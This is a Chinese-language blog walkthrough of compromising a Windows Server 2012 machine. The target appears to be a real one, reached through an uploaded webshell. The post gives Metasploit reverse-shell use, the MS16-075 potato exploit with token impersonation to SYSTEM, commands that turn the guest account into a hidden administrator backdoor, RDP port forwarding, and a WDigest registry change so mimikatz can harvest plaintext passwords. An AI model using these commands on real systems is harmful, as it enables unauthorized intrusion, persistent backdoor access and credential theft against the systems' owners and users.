实战ms16-075提权Windows Server 2012

前言

大多数碰到的都是Serverv 2008，这次遇到Server 2012来学习一下提权。网上有相关的文章。但，实践才是真理不是吗？

信息收集

在通过文件上传webshell之后开始提权。
先收集一下信息

image.png image.png image.png image.png

信息为：IIS权限、无杀毒、内网（能上外网）、内网开放3389

选择使用上传msf马来反弹shell。
参考我之前的一篇文章
geshell后的进一步利用
上传msf马直接反弹。

image.png image.png image.png

chcp       65001                                            将编码格式改为utf-8中文
download   D:\\xxxx\\upload\\out.txt   /tmp/out.txt    将系统信息输出到out.txt文件

提权

选择Windows-Exploit-Suggeste提权辅助工具
Windows-Exploit-Suggeste
命令很简单

./windows-exploit-suggester.py -i out.txt -d 2018-12-24-mssb.xls -l

image.png

可以看到可能存在ms16-075漏洞。试试吧
上传ms16-075邪恶土豆potato.exe至靶机

image.png image.png image.png image.png

execute -cH -f potato.exe   创建新的进程
use incognito               加载incoginto功能（用来盗窃目标主机的令牌或是假冒用户)
list_token -u               列出目标主机用户的可用令牌
impersonate_token   "NT AUTHORITY\SYSTEM"    假冒目标主机上的可用令牌
getuid                      查看当前权限

果然没有杀毒就是爽

image.png image.png

激活guest用户

net user guest   /active:yes
net user guest   1234qwer..   /add
net localgroup   administratrs  guest   /add

image.png

portfwd add  -l  3389  -r  172.18.104.204  -p  3389    端口转发至本地

image.png image.png

mimikatz读取hash时，无法以明文显示。
后翻看资料才知道Server 2012
默认情况下是禁用了在内存缓存中存储系统用户明文密码，此时使用mimikatz去抓取密码，会显示null。
抓取windows server 2012明文密码
只会修改注册表等待管理员重启啦

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1